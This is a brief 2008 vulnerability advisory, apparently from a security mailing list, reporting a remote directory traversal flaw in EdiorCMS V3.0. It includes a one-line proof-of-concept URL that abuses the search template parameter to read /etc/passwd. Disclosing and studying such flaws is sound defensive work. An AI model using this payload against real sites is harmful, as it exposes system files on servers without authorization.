Directory traversal in EdiorCMS V3.0


Application:  EdiorCMS V3.0

Vendor:       http://www.edior.com      

Versions:     3.0

Platforms:    ALL

Bug:          Directory traversal

Exploitation: remote

Date:         13 Mar 2008

Author:       Shennan Wang

              e-mail: [EMAIL PROTECTED]

POC:          
http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd

Directory traversal in EdiorCMS V3.0

Reply via email to